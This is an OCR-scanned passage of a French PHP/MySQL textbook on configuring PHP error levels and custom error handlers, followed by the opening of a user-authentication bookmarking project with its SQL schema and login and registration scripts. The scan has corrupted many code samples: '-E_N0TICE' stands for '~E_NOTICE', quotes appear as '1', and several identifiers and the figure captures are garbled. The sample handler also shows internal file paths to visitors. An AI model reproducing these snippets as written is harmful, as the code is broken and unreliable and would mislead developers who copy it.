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Les niveaux d'erreur 

PHP vous permet de configurer son pointillisme vis-a-vis des erreurs. Vous pouvez ainsi 
modifier les types d'evenements qui generent les messages. Par defaut, PHP affiche toutes 
les erreurs qui ne sont pas de simples avertissements. 

Le niveau d'erreur est defini grace a un ensemble de constantes predefinies presentees 
dans le Tableau 24. 1 . 

Tableau 24.1 : Les constantes permettant de definir les niveaux d'erreur 

Valeur Nom Signification 



1 E ERROR Signale les erreurs fatales en cours d'execution. 

2 E WARNING Signale les erreurs non fatales en cours d'execution. 
4 E PARSE Signale les erreurs de syntaxe. 

8 E NOTICE Signale les observations signalant qu'il y a peut-etre une 

erreur. 

16 E CORE ERROR Signale les problemes survenus au demarrage du moteur PHP. 

32 E CORE WARNING Signale les erreurs non fatales survenues au demarrage du 

moteur PHP 

64 E COMPILE ERROR Signale les erreurs de compilation. 

128 E COMPILE WARNING Signale les erreurs de compilation non fatales. 

256 E USER ERROR Signale les erreurs declenchees par l'utilisateur. 

512 E USER WARNING Signale les avertissements declenches par l'utilisateur. 

1024 E USER NOTICE Signale les observations declenchees par l'utilisateur. 

2048 E STRICT Signale 1' utilisation de comportements deprecies et non 

recommandes ; non inclus dans E ALL mais tres utile pour 
le reusinage de code. Suggere egalement les modifications 
a apporter. 

4096 E RECOVERABLE ERROR Signale les erreurs fatales recuperables. 

6143 E ALL Signale toutes les erreurs et tous les avertissements, sauf 

ceux de E STRICT. 



Chaque constante represente un type d'erreurs pouvant etre signalees ou ignorees. Si, 
par exemple, vous indiquez le niveau d'erreur E ERROR, seules les erreurs fatales seront 
signalees. Ces constantes peuvent etre combinees avec les operateurs arithmetiques 
binaires de maniere a produire differents niveaux d'erreur. 
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Le niveau d'erreur par defaut, qui affiche toutes les erreurs qui ne sont pas des obser- 
vations, est indique par : 

E_ALL & -E_N0TICE 

Cette expression est composee de deux constantes predefmies, combinees avec des 
operateurs arithmetiques binaires. Le premier, &, correspond a l'operateur ET et le 
second, -, correspond a l'operateur NON. Cette expression peut done etre lue ainsi : 
"E ALL ET NON E NOTICE". 

E ALL est elle-meme une combinaison de tous les types d'erreurs a l'exception de 
E STRICT. Cette constante peut done etre remplacee par l'expression suivante, dans 
laquelle les differents niveaux d'erreurs sont ajoutes les uns aux autres par l'operateur 
binaireOU(|). 

E_ERR0R | E_WARNING | E_PARSE | E_N0TICE | ECOREERROR | 
E_CORE_WARNING | E_C0MPILE_ERR0R | E_COMPILE_WARNING | E_USER_ERROR | 
E_USER_WARNING | E_USER_NOTICE 

De meme, le niveau d'erreur par defaut pourrait etre indique par une combinaison de 
tous les niveaux a l'exception de E NOTICE : 

E_ERR0R | E_WARNING | E_PARSE | E_C0RE_ERR0R | E_CORE_WARNING | 
E_C0MPILE_ERR0R | E_COMPILE_WARNING | E_USER_ERROR | E_USER_WARNING | 
E_USER_NOTICE 

Modifier les parametres d'affichage des erreurs 

Vous pouvez definir les parametres d'affichage des erreurs de maniere globale, dans 
votre fichier php. ini ou independamment, pour chaque script. 

Pour modifier ces parametres pour tous vos scripts, il suffit de modifier les quatre lignes 
suivantes dans le fichier php. ini par defaut : 

error_reporting = EALL & -E_N0TICE 

display_errors = On 

log_errors = Off 

track_errors = Off 

Les parametres globaux par defaut specifient qu'il faut : 

■ afficher toutes les erreurs, sauf les observations ; 

■ afficher les messages d'erreur dans la sortie standard, formates en HTML ; 

■ ne pas enregistrer les messages d'erreur dans les journaux ; 

B ne pas enregistrer les erreurs, mais placer la derniere erreur dans la variable 
$php errormsg. 

Vous modifierez probablement le niveau d'erreur en E ALL | E STRICT. Vous obtien- 
drez ainsi beaucoup plus d' observations concernant des lignes qui peuvent contenir une 
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erreur, ou qui peuvent simplement indiquer que le programmeur tire profit du typage 
faible de PHP et du fait que toutes les variables sont automatiquement initialisers a 0. 

Pendant le debogage, il peut etre interessant de choisir un error reporting plus eleve. 
Cependant, pour votre produit final, si vous fournissez vos propres messages d'erreur, il 
est generalement plus professionnel de desactiver display errors et d'activer 
log errors en conservant un error reporting assez eleve. Vous pourrez alors 
consulter les journaux en cas de probleme. 

L' activation de track errors peut vous aider a identifier les erreurs dans votre 
programme, au lieu de laisser PHP fournir ses propres fonctionnalites par defaut. Bien 
que PHP fournisse des messages d'erreur tres utiles, son comportement par defaut 
devient rapidement inutilisable lorsque les choses se passent mal. 

Par defaut, lorsqu'une erreur fatale a lieu, PHP affiche le message suivant : 
<br> 

<b>Type Erreur</b>: message d'erreur in <b>chemin/ fichier. php</b> 
on line <b>numero de ligne<lb><br> 

et arrete l'execution du script. Pour les erreurs qui ne sont pas fatales, il s'agit du meme 
texte, mais l'execution peut continuer. 

Ce code HTML met bien en evidence l'erreur, mais il n'est pas tres elegant et le style de 
ces messages a peu de chance de bien correspondre au reste du site. Certains utilisateurs 
peuvent egalement ne rien voir si le contenu de la page est affiche dans un tableau et si 
leur navigateur est assez strict sur la conformite par rapport au standard. En effet, les 
elements de tableaux ouverts mais non refermes, comme : 

<table> 

<tr><td> 

<br> 

<b>7ype Erreur</b>: message d'erreur in <b>chemin I fichier . php</b> 
on line <b>numero de ligne<lb><br> 

ne seront pas affiches par certains navigateurs. 

Vous n'etes pas oblige de conserver la gestion par defaut des erreurs de PHP ni d'utili- 
ser la meme configuration pour tous les fichiers. Pour modifier le niveau d'erreur du 
script courant, vous pouvez appeler la fonction error reporting ( ) . 

II suffit de transmettre a cette fonction une constante de niveau d'erreur ou une combi- 
naison de ces constantes, comme nous le faisions dans le fichier php. ini. Cette fonction 
renvoie le niveau d'erreur precedent. Elle est couramment utilisee de cette maniere : 

// Desactive l'affichage des erreurs. 
$ancien_niveau = error_reporting(0) ; 

// Placez ici le code qui peut produire des avertissements . 
// Active l'affichage des erreurs. 
error_reporting ($ancien_niveau) ; 
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Ce petit programme desactive l'affichage des erreurs, ce qui nous permet d'executer 
une portion de code qui a des chances de produire des avertissements que nous ne 
souhaitons pas voir afficher. 

Cela dit, il vaut mieux eviter de desactiver en permanence l'affichage des erreurs, puisque 
cela vous empechera de prendre connaissance des erreurs detectees et de les corriger. 

Declencher vos propres erreurs 

La fonction trigger error () peut etre utilisee pour declencher vos propres erreurs. 
Les erreurs creees de cette maniere sont gerees comme les erreurs classiques de PHP. 

Cette fonction prend en argument un message d'erreur, et eventuellement un type 
d'erreur. Ce dernier doit etre choisi parmi les trois suivants : E USER ERROR, 
E USER WARNING et E USER NOTICE. Si vous ne precisez aucun type, le type par defaut 
est E USER NOTICE. 

Voici un exemple d'utilisation de trigger error () : 

trigger_error( "Cet ordinateur s ' auto-detruira dans 15 secondes", 
E_USER_WARNING) ; 

Gerer correctement les erreurs 

Si vous avez l'habitude de developper en Java ou en C++, vous avez probablement 
l'habitude d'utiliser des exceptions. Celles-ci permettent aux fonctions de signaler 
qu'une erreur s'est produite et vous laissent le soin de la traiter a l'aide d'un gestion- 
naire d'exception pour gerer l'erreur. Elles ont ete traitees au Chapitre 7 ; nous n'y 
reviendrons done pas ici. 

Nous venons de voir que vous pouvez declencher vos propres erreurs, mais il est egalement 
possible de fournir vos propres gestionnaires d' erreurs, de maniere a les intercepter. 

La fonction set error handler() permet d'indiquer la fonction a appeler lorsque 
survient une erreur, un avertissement ou une observation au niveau utilisateur. II suffit 
d'appeler set error handler ( ) avec le nom de la fonction que vous souhaitez utiliser 
comme gestionnaire d'erreur. 

Votre fonction de gestion d'erreur doit prendre deux parametres : un type d'erreur et un 
message d'erreur qui permettront a votre fonction de choisir comment gerer l'erreur. Le 
type de l'erreur doit etre une constante de type d'erreur predefinie et le message 
d'erreur, une chaine de caracteres. 

Un appel a set error handler () ressemble a ceci : 
set_error_handler( ' mon_gestionnaire_erreur 1 ) ; 
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Puisque nous avons demande a PHP d'utiliser une fonction appelee 
mon gestionnaire erreur(), nous devons maintenant ecrire une fonction possedant 
ce nom avec le prototype suivant : 

mon_gestionnaire_erreur(int type_error, string error_mess 
[, string fic_err [, int ligne_err 
[, array ctxte_err] ] ] ) ) 

mais ce qu'elle fait en realite est laisse a votre entiere discretion. 

Les parametres passes a votre fonction de gestionnaire sont les suivants : 

■ le type de l'erreur ; 

■ le message d'erreur ; 

■ le fichier dans lequel l'erreur est survenue ; 

■ la ligne a laquelle l'erreur est survenue ; 

■ le tableau de symboles - autrement dit, un jeu de toutes les variables et de leurs 
valeurs au moment ou l'erreur est intervenue. 

Voici quelques actions que Ton rencontre couramment dans les fonctions de gestion 
d'erreurs : 

■ afficher le message d'erreur fourni ; 

■ enregistrer des informations dans un fichier journal ; 

■ transmettre l'erreur par courrier electronique ; 

■ terminer le script en appelant exit ( ) . 

Le Listing 24.2 presente un script qui declare un gestionnaire d'erreur, le met en place 
grace a la fonction set error handler ( ) et produit quelques erreurs. 

Listing 24.2 : gestionnaire.php — Ce script declare un gestionnaire d'erreurs personnalise 
et produit quelques erreurs 



<?php 

// La fonction du gestionnaire d'erreurs 

function mon_gestionnaire_erreur ($no_err, $mess_err, $fic_err, 

$lig_err) { 

echo "<br /><table bgcolor=\ "#cccccc\ "><tr><td> 

<p><strong>ERREUR :</strong> " .$mess_err. "</p> 
<p>Reessayez ou contactez-nous pour nous indiquer que 
l'erreur s'est produite en ligne ".$lig_err 
. " du fichier " . $fic_err . "</p>"; 

if (($no_err == E_USER_ERROR) || ($no_err == E_ERROR) ) { 
echo "<p>Erreur fatale. Fin du programme . </p> 
</td></tr></table>" ; 
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II Fermeture des ressources ouvertes, pied de page, etc. 
exit ; 

} 

echo "</td></tr></table>" ; 

} 

// Configuration du gestionnaire d'erreur 
set_error_handler( 1 mon_gestionnaire_erreur 1 ) ; 

// Declenche differents niveaux d'erreurs 
trigger_error( 'Gestionnaire appele', E_USER_NOTICE) ; 
fopen( 1 inexistant ' , 'r'); 

trigger_error ( 1 Ce ordinateur est beige', E_USER_WARNING) ; 
include ('inexistant'); 

trigger_error( "Cet ordinateur s ' auto-detruira dans 15 secondes", 
E_USER_ERROR) ; 

?> 



La sortie de ce script est presentee a la Figure 24. 1 . 



Mozilla Firefox CD 
( a I ) - ( C ) ( ) Qj Mtp^/localhostHacofchapitre 26/ges Vi T ' " C& CoogQ^' (B) ©' 



ERKEUR : Gestionnaire appeK 

Recssaycz ou comactcz-nous pour nous indiqucr que l'errcur s'cst produitc en ligne 24 du fichicr AJsers 
/jaco/Sites/chapitre 26/gcstionnairc.php 

ERREUR : fopcn(incxistant) f functiQii.fo-jcn l: failed to open stream: No such file or directory 

Recssaycz ou contaclcz-nous pour nous indiqucr que l'errcur s'cst produitc en ligne 25 du fichicr /Users 
/jaco/Sitcs/chapitre 26/gcstionnairc.php 



ERREUR : Ce ordinateur est beige 



Recssaycz ou contactcz-nous pour nous indiqucr que l'erreur s'cst produitc en ligne 26 du fichicr /Users 
/jaco/Sitcs/chapitre 26/gcstionnairc.php 

ERREUR : includc(incxistant) r function.include l: failed to open stream: No such file or directory 

Recssaycz ou contactcz-nous pour nous indiqucr que l'errcur s'cst produitc en ligne 27 du fichicr /Users 
/jaco/Sitcs/chapitre 26/gcstionnairc.php 

ERREUR : includcC) [ funclion.iiiehidc l: Failed opening 'inexistant' for inclusion (iricludc_path='.:') 

Recssaycz ou contactcz-nous pour nous indiqucr que l'erreur s'cst produitc en ligne 27 du fichicr /Users 
/jaco/Sitcs/chapitre 26/gcstionnairc.php 



Figure 24. 1 

Vous pouvez fournir des messages d'erreur personnalises si vous passez par votre propre 
gestionnaire d'erreur. 



Ce gestionnaire d'erreur personnalise ne fait pas grand-chose de plus que le gestion- 
naire d'erreur par defaut. Cependant, comme e'est vous qui ecrivez son code, vous pouvez 
lui faire faire ce que vous voulez. Vous pouvez notamment choisir ce que vous affichez 
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a vos visiteurs lorsqu'une erreur se produit et la maniere dont ces informations doivent 
etre affichees, en fonction de la presentation generale de votre site. Mais, surtout, cela 
vous permet de decider du comportement a adopter. Le script doit-il continuer ? Faut-il 
afficher un message ou l'enregistrer dans un journal ? Le support technique doit-il etre 
alerte automatiquement ? 

II est important de remarquer que votre gestionnaire d'erreur ne s'occupera pas de tous 
les types d'erreurs. Certaines erreurs, comme les erreurs de syntaxe et les erreurs fatales 
survenant en cours d'execution, seront toujours gerees de la meme maniere. Si cela 
vous gene, n'oubliez pas de verifier avec precaution les parametres avant de les passer a 
une fonction qui peut produire une erreur fatale ou de passer au niveau d'erreur 
E USER ERROR si vos parametres peuvent poser probleme. 

Si votre gestionnaire d'erreurs renvoie une valeur false explicite, le gestionnaire 
d'erreurs integre de PHP sera invoque. Vous pourrez ainsi gerer les erreurs E USER * 
vous-meme et laisser le gestionnaire d'erreurs s'occuper des erreurs standard. 

Pour la suite 

Au Chapitre 25, nous commencerons a mettre en oeuvre notre premier projet. Dans 
celui-ci, nous verrons comment vous pouvez reconnaitre les utilisateurs qui reviennent 
sur votre site et comment adapter son contenu de maniere appropriee. 



25 



Authentification des utilisateurs 

et personnalisation 

Dans ce projet, nous demandons aux utilisateurs de s'enregistrer sur notre site web. 
Apres cette etape, nous pouvons savoir ce qui les interesse et afficher le contenu approprie. 
C'est ce que Ton appelle la personnalisation en fonction de Vutilisateur. 

Ce projet permet aux utilisateurs de construire une liste de liens vers leurs sites web 
favoris et leur suggere d'autres liens susceptibles de les interesser en fonction des sites 
qu'ils ont visites. D'une maniere plus generale, la personnalisation peut etre utilisee 
dans n'importe quelle application web pour afficher du contenu plus cible, dans un 
format adapte a leurs gouts. 

Dans ce projet et dans ceux qui suivront, nous commencerons par examiner un cahier 
des charges semblable a ceux que pourraient demander d'eventuels clients. Nous trans- 
formerons ensuite les differents elements de ce cahier des charges en un ensemble de 
composants, nous construirons une architecture permettant d'interconnecter ces 
composants et nous implementerons chacun d'eux. 

Pour ce projet, nous implementerons les fonctionnalites suivantes : 

■ connexion et authentification des utilisateurs ; 

■ gestion des mots de passe ; 

■ enregistrement des preferences des utilisateurs ; 

■ personnalisation du contenu ; 

■ suggestion de sites interessants en fonction des informations que nous possedons 
sur un utilisateur. 
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Composants de la solution 

Notre travail consiste a construire un prototype pour un systeme en ligne d'enregistre- 
ment de favoris que nous appellerons PHPbookmark. Ce systeme ressemble done au 
systeme de Backflip, mais avec moins de fonctionnalites. Pour plus d' informations sur 
Backflip, consultez le site http://www.backflip.com. 

Notre systeme doit permettre aux utilisateurs de se connecter, d'enregistrer leurs sites 
favoris et il doit egalement proposer des sites qui pourraient les interesser en fonction 
de leurs preferences personnelles. 

Ces composants de la solution peuvent etre classes en trois categories. 

■ Nous devons pouvoir identifier les differents utilisateurs. II nous faut egalement un 
systeme pour les authentifier. 

■ Nous devons pouvoir enregistrer les liens vers leurs sites favoris. Les utilisateurs 
doivent disposer de la possibilite d'ajouter et de supprimer ces liens. 

■ II faut etre en mesure de recommander des sites susceptibles d'interesser les utilisateurs 
en fonction de ce que nous savons deja sur eux. 

Maintenant que nous connaissons les grandes lignes du projet, nous pouvons commen- 
cer a concevoir une solution et ses composants. Essayons de passer en revue quelques 
solutions pour chacune de ces trois exigences. 

Identification des utilisateurs et personnalisation 

Comme nous l'avons deja vu precedemment, il existe plusieurs techniques permettant 
d' authentifier les utilisateurs. Comme nous souhaitons offrir du contenu personnalise, 
nous enregistrons les noms des utilisateurs et les mots de passe dans une base de 
donnees MySQL qui nous servira a les authentifier. 

Si nous permettons aux utilisateurs de se connecter en saisissant un nom d'utilisateur et 
un mot de passe, nous avons besoin des composants suivants : 

■ Les utilisateurs doivent pouvoir s'inscrire en fournissant un nom d'utilisateur et un 
mot de passe. II nous faudra imposer des restrictions sur la longueur et le format de 
ces informations. Les mots de passe devront etre enregistres dans un format chiffre 
pour des raisons de securite. 

■ Les utilisateurs doivent pouvoir se connecter avec les informations qu'ils ont fournies 
lors de leur enregistrement. 

■ Les utilisateurs doivent avoir la possibilite de se deconnecter lorsqu'ils ont fini 
d'utiliser le site. Cela n'est pas particulierement important si les utilisateurs accedent a 
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notre site depuis leur machine personnelle, mais cet aspect de la securite est essentiel 
s'ils accedent au site depuis un ordinateur partage. 

■ Le site doit pouvoir determiner si un utilisateur est connecte et acceder aux donnees 
correspondant a un utilisateur connecte. 

■ Les utilisateurs doivent pouvoir modifier leur mot de passe pour ameliorer la securite 
generale du site. 

■ Les utilisateurs doivent pouvoir modifier leur mot de passe sans notre assistance. 
Pour ce faire, on propose generalement aux utilisateurs d'envoyer leur mot de passe 
a l'adresse e-mail qu'ils ont fournie lors de leur inscription. Cela signifie done que 
nous devons enregistrer cette adresse e-mail au moment de leur inscription. Comme 
nous enregistrons les mots de passe dans un format chiffre et qu'il est impossible de 
les dechiffrer pour retrouver les mots de passe d'origine, il faut en fait generer un 
nouveau mot de passe, l'activer et le transmettre a 1' utilisateur par e-mail. 

Pour realiser ce projet, nous allons ecrire des fonctions pour chacune de ces fonction- 
nalites. La plupart d'entre elles seront reutilisables, eventuellement apres quelques 
modifications mineures, dans d'autres projets. 

Enregistrer les liens vers les sites favoris 

Pour enregistrer les favoris d'un utilisateur, nous devons amenager un espace particulier 
dans notre base de donnees MySQL. Nous aurons besoin des fonctionnalites suivantes : 

■ Les utilisateurs doivent pouvoir recuperer et afficher leurs favoris. 

■ Les utilisateurs doivent pouvoir ajouter de nouveaux favoris. Le site doit verifier 
qu'il s'agit bien d'URL valides. 

■ Les utilisateurs doivent pouvoir supprimer des favoris de leur liste. 

Une fois encore, nous ecrirons des fonctions pour chacune de ces fonctionnalites. 

Sites suggeres 

II existe plusieurs techniques pour suggerer une liste de sites a un utilisateur. Nous 
pouvons nous contenter d' afficher les sites les plus populaires dans un domaine particu- 
lier. Pour ce projet, nous allons implementer un systeme de suggestion qui recherche les 
utilisateurs qui ont un favori en commun avec 1' utilisateur connecte et qui lui proposera 
les autres favoris de ces utilisateurs. Pour eviter de proposer des favoris un peu trop 
personnels, nous nous contentons d'afficher ceux enregistres par plus d'un utilisateur. 

Cette fonctionnalite sera, elle aussi, implemented par une fonction. 
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Resume de la solution 

Apres avoir griffonne quelques ebauches, nous avons retenu le diagramme de la 
Figure 25.1. 



Page de 
connexion 




Ajout 
des fav. 




Suppression 
de fav. 




Suggestion 




Modif. 
mot de passe 




Deconnexion 



Figure 25. 1 

Ce diagramme presente les differents composants du systeme PHPbookmark. 

Nous allons construire un module pour chaque composant de ce diagramme ; certains 
ne necessiteront qu'un script, d'autres en demanderont deux. Nous allons egalement 
mettre en place des bibliotheques de fonctions pour : 

■ L' authentication des utilisateurs. 

■ L'enregistrement et la recuperation des favoris. 
i La validation des donnees. 

■ Les connexions a la base de donnees. 

■ L'affichage dans le navigateur. Toutes les fonctions de generation de code HTML se 
trouveront dans cette bibliotheque pour que la presentation visuelle reste coherente 
sur tout le site (on utilise ainsi une approche separant la logique de 1' application du 
contenu). 

Nous devons egalement mettre en place une base de donnees pour ce systeme. 

Nous etudierons en detail 1' implementation de chaque fonctionnalite, mais vous trouve- 
rez l'integralite du code de cette application sur le site Pearson (www.pearson.fr), 
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dans le repertoire chapitre25. Le Tableau 25.1 contient un resume des fichiers de ce 
repertoire. 



Tableau 25.1 : Les fichiers de ('application PHPbookmark 



Nom du fichier 



Description 



f avoris . sql 

login . php 
register form. php 

register new. php 
forgot form. php 

forgot passwd.php 
member . php 
add bm form. php 
add bms.php 
delete bms.php 

recommend . php 

change passwd form. php 
change passwd.php 

logout . php 
bookmark fns.php 
data valid fns.php 
db fns.php 
user auth fns.php 
url fns.php 

output fns.php 
bookmark . gif 



Instructions SQL permettant de creer la base de donnees 
PHPbookmark 

Page d'accueil avec un formulaire de connexion au systeme 

Formulaire permettant aux utilisateurs de s'enregistrer aupres du 
systeme 

Script qui traite l'enregistrement des nouveaux utilisateurs 

Formulaire a remplir par les utilisateurs qui ont oublie leur mot de 
passe 

Script pour reinitialiser les mots de passe oublies 

Page principale d'un utilisateur, qui contient tous ses sites favoris 

Formulaire permettant d'ajouter de nouveaux sites favoris 

Script pour ajouter de nouveaux sites dans la base de donnees 

Script permettant de supprimer les sites selectionnes dans la liste 
de l'utilisateur 

Script pour suggerer des sites, en fonction des utilisateurs qui ont 
les memes gouts 

Formulaire a remplir pour modifier le mot de passe actuel 

Script permettant de modifier le mot de passe de l'utilisateur dans 
la base de donnees 

Script pour fermer la session d'un utilisateur 

Ensemble de declarations a inclure pour 1' application 

Fonctions permettant de valider les donnees saisies par l'utilisateur 

Fonctions pour se connecter a la base de donnees 

Fonctions implementant 1' authentification des utilisateurs 

Fonctions pour ajouter et supprimer des sites et effectuer des 
suggestions 

Fonctions pour formater la sortie en HTML 
Logo de PHPbookmark 
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Nous commencerons par implementer la base de donnees MySQL de cette application, 
puisqu'elle est necessaire a toutes les autres fonctionnalites. 

Nous presenterons ensuite le code dans l'ordre ou il a ete dent, en commencant par 
la page d'accueil, avant de nous interesser a l'authentification des utilisateurs, a 
l'enregistrement et a la lecture des favoris, et en terminant par les suggestions. Cet 
ordre est assez logique, puisqu'il respecte les dependances existant entre les differents 
modules. 



Astuce 



Vous devez utiliser un navigateur avec JavaScript active pour visualiser correctement I'appli 
cation. 



Implementation de la base de donnees 

Le schema de la base de donnees PHPbookmark est assez simple. Nous devons enregis- 
trer les utilisateurs, leur adresse e-mail et leur mot de passe. Nous devons egalement 
enregistrer les URL de leurs favoris. Un utilisateur peut enregistrer plusieurs favoris et 
plusieurs utilisateurs peuvent enregistrer le meme favori. Nous avons par consequent 
besoin de deux tables, user et bookmark (voir Figure 25.2). 



user 



username 


passwd 


email 


laura 
luke 


7cbf26201e73c9b 
1fef10690eeb2e59 


laura@tangledweb.com.au 
luke@tangledweb.com.au 



bookmark 



username 


bmJJRL 


laura 
laura 


http://slashdot.org 
http://php.net 



Figure 25.2 

Le schema de la base de donnees du systeme PHPbookmark. 

La table user contient les noms des utilisateurs (qui servent de cle primaire), les mots 
de passe et les adresses e-mail. 

La table bookmark contient des paires (nom d'utilisateur, lien) ou le lien est designe par 
bm URL. Dans cette table, le nom d'utilisateur fait reference a un nom d'utilisateur qui 
se trouve dans la table user. 
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Le Listing 25.1 contient le code SQL permettant de creer cette base de donnees et un 
utilisateur pouvant se connecter a celle-ci a partir du Web. Vous pouvez modifier ce 
fichier si vous avez l'intention de l'utiliser sur votre systeme et assurez-vous de changer 
le mot de passe de l'utilisateur ! 

Listing 25.1 : bookmarks.sql — Le fichier SQL permettant de configurer la base de donnees 

create database bookmarks; 
use bookmarks; 

create table user ( 

username varchar(16) not null primary key, 
passwd char(40) not null, 
email varchar(100) not null 

); 

create table bookmark ( 

username varchar(16) not null, 

bmJJRL varchar(255) not null, 

index (username) , 

index (bm_URL), 

primary key (username, bm_URL) 

); 

grant select, insert, update, delete 
on bookmarks.* 

to bm_user@localhost identified by 'password'; 



Nous pouvons installer cette base de donnees sur notre systeme en executant ces 
commandes sous le compte de l'utilisateur root de MySQL. Vous pouvez le faire sur la 
ligne de commande avec 1' instruction suivante : 

mysql -u root -p < bookmarks.sql 

Vous devrez donner ensuite le mot de passe de root. 

Maintenant que la base de donnees est configuree, nous pouvons nous attaquer a 
1' implementation du site. 

Implementation du site de base 

La premiere page que nous allons construire sera appelee logimphp, puisqu'elle permet 
aux utilisateurs de se connecter a notre systeme. Le code de cette page est presente dans 
le Listing 25.2. 
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Listing 25.2 : login.php — La page d'accueil de PHPbookmark 



<?php 

require_once ( ' bookmark_f ns . php ' ) ; 
do_html_header( 1 ' ) ; 

display_site_inf o ( ) ; 
display_login_f orm( ) ; 

do_html_footer( ) ; 
?> 



Ce code est tres simple puisqu'il se contente essentiellement d'appeler des fonctions de 
l'API que nous allons construire pour cette application. Nous reviendrons sur le detail 
de ces fonctions dans un instant. Cependant, la seule lecture de ce fichier montre que 
nous incluons un fichier (contenant les fonctions) et que nous appelons des fonctions 
pour creer un en-tete HTML, afficher un contenu et creer un code HTML pour le pied 
de page. 

La sortie de ce script est presentee a la Figure 25.3. 

Toutes les fonctions du systeme se trouvent dans le fichier bookmarkjhs.php, presente 
dans le Listing 25.3. 



File Edit View History Bookmarks Tools Help 



" LiJ | http://loc alho5t''phpmy5ql46''criapter27/login,prip 



PHPbookmark 



* Store your bookmarks online with usf 

* See what other users use[ 

* Share your favorite links with others! 

Not a member? 

Members log in here: 
Usemame: 
Password: 



Forgot your password? 



n here: 

Log in | 
assword? 



Figure 25.3 

La page d'accueil de PHPbookmark est produite par les fonctions de generation de code HTML 
de login.php. 
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Listing 25.3 : bookmark jfns.php — Le fichier a inclure contenant les fonctions 
de I'application PHPbookmark 



<?php 

// Nous pouvons inclure ce fichier dans tous nos fichiers, 
//afin que chaque fichier contienne toutes nos fonctions et exceptions. 
require_once ( ' data_valid_f ns . php 1 ) ; 
require_once ( ' db_f ns . php 1 ) ; 
require_once ( ' user_auth_f ns . php ' ) ; 
require_once ( ' output_f ns . php 1 ) ; 
require_once ( ' url_f ns . php 1 ) ; 
?> 



Comme vous pouvez le constater, ce fichier se contente d' inclure les cinq autres fichiers 
que nous utiliserons dans cette application. Nous avons choisi cette structure car ces 
fonctions peuvent etre classees en cinq groupes logiques. Certains de ces groupes 
pouvant etre reutilises dans d' autres projets, nous avons choisi de placer chaque groupe 
de fonctions dans un fichier separe que nous pourrons reutiliser lorsque nous en aurons 
besoin. Nous les avons reunis dans le fichier bookmark _fns. php car la plupart de ces 
fonctions seront utilisees dans la majorite de nos scripts : il est plus simple d' inclure un 
seul fichier dans chaque script que d' avoir cinq instructions require. 

Ici, nous utilisons des fonctions du fichier output _fns. php, qui sont relativement simples 
et qui produisent du code HTML brut. Ce fichier inclut les quatre fonctions dont nous 
nous sommes servis dans login.php, c'est-a-dire do html header (), display site 
info (), display login form()etdo html footer (), entre autres. 

Nous n'etudierons pas toutes ces fonctions en detail, mais nous allons cependant nous 
interesser a l'une d'entre elles, a titre d'exemple. Le code de do html header () se 
trouve dans le Listing 25.4. 

Listing 25.4 : La fonction do_html_header() de output_fns.php — Cette fonction 
produit I'en-tete standard qui apparaTtra sur chaque page de I'application 



function do_html_header($title) { 
// Affiche un en-tete HTML 

?> 
<html> 
<head> 

<title><?php echo $title;?></title> 
<style> 

body { font-family: Arial, Helvetica, sans-serif; font-size: 13px } 

li, td { font-family: Arial, Helvetica, sans-serif; font-size: 13px } 

hr { color: #3333cc; width=300; text-align=lef t} 

a { color: #000000 } 

</style> 
</head> 
<body> 

<img src="bookmark.gif " alt="PHPbookmark logo" border="0" 
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align="left" valign=" bottom" height="55" width="57" /> 
<h1>PHPbookmark</h1> 
<hr /> 
<?php 

if($title) { 

do_html_heading($title) ; 

} 

} 



Comme vous pouvez le constater, le seul code de la fonction do html header () 
consiste a ajouter le titre et l'en-tete appropries dans la page. Les autres fonctions dont 
nous nous sommes servis dans login.php sont similaires. La fonction 
display site info() ajoute un texte general sur le site, display login form() affi- 
che le formulaire de la Figure 25.3 et do html f ooter ( ) ajoute un pied de page HTML 
standard a la page. 

Nous avons vu au Chapitre 23 qu'il est interessant de separer le code HTML de la logique 
de 1' application. Nous utilisons done ici une approche d'API de fonctions. 

En examinant la Figure 25.3, vous pouvez constater qu'elle contient trois options : 
l'utilisateur peut s'enregistrer, se connecter s'il s'est deja enregistre ou reinitialiser son 
mot de passe s'il l'a oublie. Pour implementer ces modules, nous devons passer a la 
section suivante, consacree a 1' authentification des utilisateurs. 

Implementation de I'authentification des utilisateurs 

Le module d' authentification des utilisateurs contient quatre elements principaux : 
l'enregistrement des utilisateurs, la connexion et la deconnexion, la modification des 
mots de passe et leur reinitialisation. Nous allons maintenant nous interesser a chacun 
de ces elements. 

Enregistrement 

Pour enregistrer un utilisateur, nous devons recuperer ses informations personnelles via 
un formulaire et 1' ajouter dans la base de donnees. 

Lorsqu'un utilisateur clique sur le lien Not a member? de la page login.php, il est ache- 
mine vers un formulaire d'enregistrement cree par register _form.php, dont le code est 
presente dans le Listing 25.5. 

Listing 25.5 : registerjform.php — Ce formulaire permet aux utilisateurs de s'enregistrer 
sur le site PHPbookmark 



<?php 

require_once( ' bookmark_f ns . php ' ) ; 
do_html_header ( 1 User Registration 1 ) ; 
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display_registration_f orm( ) ; 

do_html_footer( ) ; 
?> 



Une fois encore, vous pouvez constater que cette page est tres simple et qu'elle se 
contente d'appeler des fonctions provenant de la bibliotheque d'affichage de 
output Jns.php. La Figure 25.4 represente le resultat de ce script. 

Le formulaire grise de cette page est produit par la fonction display regis 
tration form() contenue dans output Jns.php. Lorsque l'utilisateur clique sur le 
bouton Register, il voit s'afficher la page produite par register _new.php , dont le code 
est presente dans le Listing 25.6. 
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Email address: 

Preferred username 
[max 16 chars): 
Password 

[between 6 and 16 chars): 
Ccnfirm password: 




Figure 25.4 

Le formulaire d'enregistrement permet de saisir les informations dont nous avons besoin dans la 
base de donnees. Nous demandons aux utilisateurs de saisir deux fois leur mot de passe, de faqon 
a eviter les erreurs de saisie. 



Listing 25.6 : register _new.php — Ce script valide les donnees d'un nouvel utilisateur 
et les enregistre dans la base de donnees 



<?php 

// Inclusion des fonctions de 1 ' application 
require_once( ' bookmark_f ns . php ' ) ; 

// Creation de noms de variables courts 
$email=$_POST[ 1 email ' ] ; 
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$username=$_POST[ 1 username ' ] ; 
$passwd=$_POST[ 'passwd' ] ; 
$passwd2=$_P0ST[ 1 passwd2 1 ] ; 

// Lance la session qui pourra servir plus tard. 

// On la lance maintenant car il faut le faire avant de produire des 
// en-tetes. 
session_start ( ) ; 
try { 

// Verifie que le formulaire a ete rempli 
if ( !filled_out($_POST) ) { 

throw new Exception ( 1 You have not filled the form out correctly - 
please go back and try again. 1 ); 

} 

// L'adresse email n'est pas valide 
if ( ! valid_email($email) ) { 

throw new Exception ( 1 That is not a valid email address. 
Please go back and try again. 1 ); 

} 

// Les deux mots de passe sont differents 
if ($passwd != $passwd2) { 
throw new Exception ( 1 The passwords you entered do not match - 
please go back and try again. 1 ); 

} 

